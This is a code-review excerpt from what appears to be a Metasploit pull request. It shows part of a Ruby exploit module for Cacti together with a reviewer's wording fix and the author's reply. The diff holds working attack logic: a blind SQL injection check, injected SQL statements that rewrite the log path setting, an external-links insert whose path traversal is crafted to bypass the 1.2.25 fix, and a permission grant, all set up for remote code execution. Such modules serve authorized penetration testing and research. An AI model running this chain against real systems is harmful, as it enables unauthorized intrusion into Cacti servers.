modules/exploits/multi/http/cacti_pollers_sqli_rce.rb

```diff
@@ -0,0 +1,345 @@
+    )
+    return CheckCode::Unknown('Could not access `pollers.php` - no response') if res.nil?
+    return CheckCode::Safe('Could not access `pollers.php` - insufficient permissions') if res.code == 401
+    return CheckCode::Unknown("Could not access `pollers.php` - unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+    # Step 4 - Check if it is vulnerable to SQLi
+    print_status('Attempting SQLi to check if the target is vulnerable')
+    return CheckCode::Safe('Blind SQL injection test failed') unless sqli.test_vulnerable
+
+    CheckCode::Vulnerable
+  end
+
+  def get_ext_link_id
+    # Get an unused External Link ID with a time-based SQLi
+    @ext_link_id = rand(1000..9999)
+    loop do
+      _res, elapsed_time = Rex::Stopwatch.elapsed_time do
+        sqli.raw_run_sql("if(id,sleep(#{datastore['SqliDelay']}),null) from external_links where id=#{@ext_link_id}")
+      end
+      break if elapsed_time < datastore['SqliDelay']
+
+      @ext_link_id = rand(1000..9999)
+    end
+    vprint_good("Got external link ID #{@ext_link_id}")
+  end
+
+  def exploit
+    # `#do_login` will take care of populating `@csrf_token` and `@cacti_version`
+    fail_with(Failure::NoAccess, 'Login failure') unless @logged_in || do_login
+
+    @log_file_path = "log/cacti#{rand(1..999)}.log"
+    print_status("Backing up the current log file path and adding a new path (#{@log_file_path}) to the `settings` table")
+    @log_setting_name_bak = '_path_cactilog'
+    sqli.raw_run_sql(";update settings set name='#{@log_setting_name_bak}' where name='path_cactilog'")
+    @do_settings_cleanup = true
+    sqli.raw_run_sql(";insert into settings (name,value) values ('path_cactilog','#{@log_file_path}')")
+
+    print_status("Inserting the log file path `#{@log_file_path}` to the external links table")
+    log_file_path_lfi = "../../#{@log_file_path}"
+    # Some specific path tarversal needs to be prepended to bypass the v1.2.25 fix in `link.php` (line 79):
+    #   $file = $config['base_path'] . "/include/content/" . str_replace('../', '', $page['contentfile']);
+    log_file_path_lfi = "....//....//#{@log_file_path}" if @cacti_version && Rex::Version.new(@cacti_version) == Rex::Version.new('1.2.25')
+    get_ext_link_id
+    sqli.raw_run_sql(";insert into external_links (id,sortorder,enabled,contentfile,title,style) values (#{@ext_link_id},2,'on','#{log_file_path_lfi}','Log-#{rand_text_numeric(3..5)}','CONSOLE')")
+    @do_ext_link_cleanup = true
+
+    print_status('Getting the user ID and setting permissions (it might take a few minutes)')
+    user_id = sqli.run_sql("select id from user_auth where username='#{datastore['USERNAME']}'")
+    fail_with(Failure::NotFound, 'User ID not found') unless user_id =~ (/\A\d+\Z/)
+    sqli.raw_run_sql(";insert into user_auth_realm (realm_id,user_id) values (#{10000 + @ext_link_id},#{user_id})")
+    @do_perms_cleanup = true
+
+    print_status('Logging again to apply new settings and permissions')
```

Comment:
I think this should be Logging *in* again...

```suggestion
    print_status('Logging in again to apply new settings and permissions')
```

Reply:
Good catch, thanks! Addressed in [81eba7a](https://github.com/rapid7/metasploit-framework/pull/18769/commits/81eba7a6e7e4ff810219e5a2f868f64be4d10b97)